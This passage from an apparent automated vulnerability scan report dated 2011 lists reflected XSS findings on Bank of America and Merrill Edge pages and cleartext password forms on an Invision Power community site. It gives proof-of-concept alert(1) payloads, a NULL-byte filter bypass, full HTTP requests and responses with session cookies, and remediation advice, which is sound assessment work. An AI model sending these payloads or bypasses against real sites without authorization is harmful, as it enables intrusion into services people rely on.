Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacy/Control.do HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9b0853'%3balert(1)//b444241d7da; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:05:17 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=00004QCD_ZjewAQatQwb0kn5dXN:12qb4kb6q; Path=/
Set-cookie: INTL_LANG=en_US
Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:05:16 GMT; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Descri
...[SNIP]...
<!--


               cmSetProduction();
       

               cmCreateRegistrationTag(null,
                   'overview',
                   '20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9b0853';alert(1)//b444241d7da',
                   false,
                   null,
                   null,
                   'privacy',
                   null,
                   null,
                   null);
       
       
//-->
...[SNIP]...

3.178. https://www.bankofamerica.com/privacy/index.jsp [BOA_0020 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /privacy/index.jsp

Issue detail

The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3fed0'%3balert(1)//f83f2273ab8 was submitted in the BOA_0020 cookie. This input was echoed as 3fed0';alert(1)//f83f2273ab8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacy/index.jsp HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de93fed0'%3balert(1)//f83f2273ab8; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:05:15 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000CnfCKRIifEAopeDjObSoiF3:12qb4k93q; Path=/
Set-cookie: INTL_LANG=en_US
Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:05:14 GMT; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Descri
...[SNIP]...
<!--


               cmSetProduction();
       

               cmCreateRegistrationTag(null,
                   'overview',
                   '20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de93fed0';alert(1)//f83f2273ab8',
                   false,
                   null,
                   null,
                   'privacy',
                   null,
                   null,
                   null);
       
       
//-->
...[SNIP]...

3.179. https://www.bankofamerica.com/smallbusiness/index.jsp [BOA_0020 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /smallbusiness/index.jsp

Issue detail

The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0296'%3balert(1)//224de741dab was submitted in the BOA_0020 cookie. This input was echoed as a0296';alert(1)//224de741dab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /smallbusiness/index.jsp HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9a0296'%3balert(1)//224de741dab; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:39 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000iSQjObSnt8ukh_g0-dQwNmC:12qb4k2ev; Path=/
Set-cookie: INTL_LANG=en_US
Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:04:38 GMT; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Descript
...[SNIP]...
<!--


               cmSetProduction();
       

                                   cmCreateRegistrationTag(null,
                   'smbiz',
                   '20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9a0296';alert(1)//224de741dab',
                   false,
                   null,
                   null,
                   'homepage');
//-->
...[SNIP]...

3.180. https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/merrill-edge-advisory-center.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f9e1d"><script>alert(1)</script>a47d51819dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9e1d"><script>alert(1)</script>a47d51819dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /m/pages/merrill-edge-advisory-center.aspx?%00f9e1d"><script>alert(1)</script>a47d51819dc=1 HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:19:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=BfHCSpf1XdlgqGUGWs5GJb7ApnrhS12v/Tvpa1aJhw0ZnGGnuZ6bTj58dvvXGcwfnckNONxzCEv1N22wUiaJsnm+vXwcidlJpMoGsMtahznFQYgoPc905EhsHsqhiOZH7Rxb0WWIDp1DQKg3EVdq6d+bjMi2o93Ny3EQ9mFhn8xCCDN8lX7473ePJ3uHJW3tZ8tQGk1AzMZRg4gB/N42hMRP+0I3UTYZzoYtJRcPMbuN1mRYsfJrzM6v7u+W68Hu5OW8xC6B802FtyllZlajSovSkJ4MqUrg8+eW1+guvwhGlAUjGQlQRuEJcUjt9YU60Qd/Law8UckN1K81LJjhKLf8x0wWLo7yi4BRrMXjHHosEfh1Xme+65zDrtvFBY5uADVwNpvE/hK+SrKanl4NaTPGdsMNm3ZJ+BecNOBwNfIWEbjY/rC5GP6qWY/hy5xZA4NpXENbXDQ+KIRUclZPf39f6qyFLqD3aaVfNPm3ec9qyLzhCl1ZxryNdB5Ut/OqS7gCqzFaNwXZyw94qSICMytNigTk/7mGjQ+94Nb5rCUS4kteonhMxxk/8AQq21Rgxw9XA8WlCz6O0C+aLkuzjmG1kiu8jF+tTv1mU8RIZdeAXka/dCS99D4tuy14uRR9; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Location: http://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx?%00f9e1d%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea47d51819dc=1
Set-Cookie: pxs=82f6fd15b4a44839afcaacbd61ee9100; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 101126


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<a href="../System/SearchResults.aspx?.f9e1d"><script>alert(1)</script>a47d51819dc=1&k=" id="ctl00_ECMSSearchTextBox1_srchAnchor1" class="btn" onclick="return objSearchWidgetLibrary.onsearchclick1('ctl00_ECMSSearchTextBox1_srcText','ctl00_ECMSSearchTextBox1_srchAnchor1')">
...[SNIP]...

3.181. https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx [src_cd parameter]  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.merrilledge.com
Path:   /m/pages/merrill-edge-advisory-center.aspx

Issue detail

The value of the src_cd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0095641'%3b9ef12e8200f was submitted in the src_cd parameter. This input was echoed as 95641';9ef12e8200f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /m/pages/merrill-edge-advisory-center.aspx?src_cd=BAC1%0095641'%3b9ef12e8200f HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:20:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=dTGW1OKP96ZWaYiqHpyXjmwGih/P6M4KNJl7BjKqNxZVvBmTMUiLl7vy5OU6W7vQx+Q3OlhYD6fR7JzCT4ENyMJHosxQ005rwDguhsrLIsy9P8FuzFjtfTXGwRTydUvo/3XF0IfvrKYy2FF1eIy/aOVyNYjo2hwAK/fY0M3F2rMEcjaLudR61/8av7j1HVfw8l1YT3+2QqLHHZNi8q26sYUl+aSjgjP0kT7mGmGbOGY1aYlPzDg+b7bp9xsB8pC1sPjCfkQ2flhBLs2rqT5kxrtQ9UZHLmR770tdTgquQIkqPgRVIJpP9Yw7qlEO0Cd4Xkyw65nXuMN5qvMFSB79shDrWD+dR6ZPuZDx9Lr2UwMKj4MLrPxmeukjr0etlj80ztv+wzFqwNNj5Ia4Buw7EKD7m1H5KxZz8ddFtjk5+eHbgA6pVwKWIctQxdOqL7KcFMuqBj/DBnBzzcXEyXTyL5Zt/RNlLwMh24ep1IYG3X+ked1D0+XSar0cP5S1YTspDtzpw6JovE7koEfRpqcJdC3MCyB+XPxB+kG9jirdZ+oVWD3P3bYw9YBGOayeqNmnRJl1fVHV140hUpkvZ1jntSXrV4z3Izx3d6VR0Vweg8xLjTf67EgdrHPuGUdkaO0N; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Location: http://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx?src_cd=BAC1%0095641'%3b9ef12e8200f
Set-Cookie: pxs=14a1ffa6d76642968f1b53551d28d1bb; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 77626


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><!-- Thank you for using
...[SNIP]...
<![CDATA[
var SPC = {
'Tactic' : 'BAC1.95641';9ef12e8200f'
,'Page' : 'merrill-edge-advisory-center'
,'preview' : false
};
//]]>
...[SNIP]...

3.182. http://www.retirement.merrilledge.com/IRA/pages/home.aspx [pxs cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.retirement.merrilledge.com
Path:   /IRA/pages/home.aspx

Issue detail

The value of the pxs cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c13e'-alert(1)-'c4f9da1816c was submitted in the pxs cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /IRA/pages/home.aspx HTTP/1.1
Host: www.retirement.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pxs=689c136b798e446897d1c2e0184bb0f55c13e'-alert(1)-'c4f9da1816c; SMIDENTITY=pD0NN85dpKsfx4BE99QArdi7rMPowZAp7prEX+xQsDRMZ5srEb6GWErE0ytcq4STJF6RcnSEbMoqhPh20hiX9f5JuWLY3Sh0nVg+L0bkPZp8qurqKXGj/drs1Sn6FhhN7RurCP0kK/9BVZCixCGwFXnpPgkR7yd/C9Ci7CEdBuIZ2phvHS3TICDfcva4faAIZLGdCT0rJZfWSHqGBGRuS5wEBKSn0pDx44kMCJ/a2HEa+Zu0fT4K1i/+8UG4BntMDKs6xA/EgABaMXNP6xhj+XNMspLCnGY0vTmGIQrLrF1rsj2YGCWdB5tUEWE3XtqwGQgQPxrqBH7Elt9ELCr4PmPlmXAd+5Ulox5teW48BAV7hlSkTVM2gm3bMpyD77ckeumpzJ5KAi4+BNg0DeBoTY9rYwqbZhf4vwXlnYb4lG5nVuz8sI+SKIWGUMDxfYcZBV6FBKk1Y5IlaVyugds9CwwP5J9aQ0dKe0g9/CjI6lRNE4NcVrDBUbv7c7WvxH0AFm3z2Rs4P96BbBwGYkdZ9CEz3D3DfltUqi+e1CLIx23wojYb+xRFVed43Jq5b7jCPdRqlbRDmd7jV0ZPq6jE1GPAZRnhhoxVr6Mh7eTrYMLa45VGhXkFG4gTdf3j3mfd; pxv=4B1B9E90-7DD2-4095-A535-9FE88031C408; CMAVID=none; cmTPSet=Y; BrowserCheckDone=true;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:45:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 36286


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<![CDATA[
lpAddVars('page','section','Home');
lpAddVars('page','ConversionStage','Home');
lpAddVars('page','Session ID','689c136b798e446897d1c2e0184bb0f55c13e'-alert(1)-'c4f9da1816c');
var cookieExists=false;Sys.Application.initialize();
Sys.Application.add_init(function() {
$create(MerrillLynch.Application.ECMS.WebUI.ECMSContentCtrl, {"Application":"IRA","ContentLocations
...[SNIP]...

4. Cleartext submission of password  previous  next
There are 19 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


4.1. http://community.invisionpower.com/index.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /index.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /index.php?app=core&module=global&section=login HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:56:13 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=90a4f9618eeed4cbd7aef4daf30fa72a; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 22:56:13 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 31585

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
</div>
       <form action="http://community.invisionpower.com/index.php?app=core&amp;module=global&amp;section=login&amp;do=process" method="post" id='login'>
       <input type='hidden' name='auth_key' value='880ea6a14ea49e853634fbdc5015a024' />
...[SNIP]...
</label>
                       <input id='password' type='password' class='input_text' name='password' size='25' /><br />
...[SNIP]...

4.2. http://community.invisionpower.com/resources/documentation/index.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /resources/documentation/index.html HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:56:11 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=16bbd6a3efa6f42a30f8d5c0d22a2d10; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 22:56:12 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 32760

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<div id='member_block' class='logged_out'>
   
       <form action='http://community.invisionpower.com/index.php?app=core&module=global&section=login&do=process' method='post'>
           <input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html' />
...[SNIP]...
<input type="text" class='input_text' size="20" name="username" id='welcome-username' onfocus="clearField('welcome-username');" value="Username or email" />
           <input type='password' class='input_text' size='20' name='password' id='welcome-password' onfocus="clearField('welcome-password');" value='Username or email' />
           <input type='submit' class='input_submit' value='Sign In' />
...[SNIP]...

4.3. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/installation-r17  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html/_/documentation/getting-started/installation-r17

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /resources/documentation/index.html/_/documentation/getting-started/installation-r17 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:08:26 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=26a6b17494dde8cfa26a90ef195a3c6d; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:08:27 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:08:27 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MjS3BhJGlmZmlobmBmbWtVwwUA4GMg%2C%2C; expires=Fri, 03-Feb-2012 00:08:27 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 34380

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<div id='member_block' class='logged_out'>
   
       <form action='http://community.invisionpower.com/index.php?app=core&module=global&section=login&do=process' method='post'>
           <input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/installation-r17' />
...[SNIP]...
<input type="text" class='input_text' size="20" name="username" id='welcome-username' onfocus="clearField('welcome-username');" value="Username or email" />
           <input type='password' class='input_text' size='20' name='password' id='welcome-password' onfocus="clearField('welcome-password');" value='Username or email' />
           <input type='submit' class='input_submit' value='Sign In' />
...[SNIP]...

4.4. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:08:31 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=23b36da2676ec4b7a7eada851882031e; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:08:33 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:08:33 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MjU0sc60MjSyNDOzNDQ3NLauBVwwVbgGYg%2C%2C; expires=Fri, 03-Feb-2012 00:08:33 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 33618

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<div id='member_block' class='logged_out'>
   
       <form action='http://community.invisionpower.com/index.php?app=core&module=global&section=login&do=process' method='post'>
           <input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514' />
...[SNIP]...
<input type="text" class='input_text' size="20" name="username" id='welcome-username' onfocus="clearField('welcome-username');" value="Username or email" />
           <input type='password' class='input_text' size='20' name='password' id='welcome-password' onfocus="clearField('welcome-password');" value='Username or email' />
           <input type='submit' class='input_submit' value='Sign In' />
...[SNIP]...

4.5. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/upgrading-r18  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html/_/documentation/getting-started/upgrading-r18

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /resources/documentation/index.html/_/documentation/getting-started/upgrading-r18 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
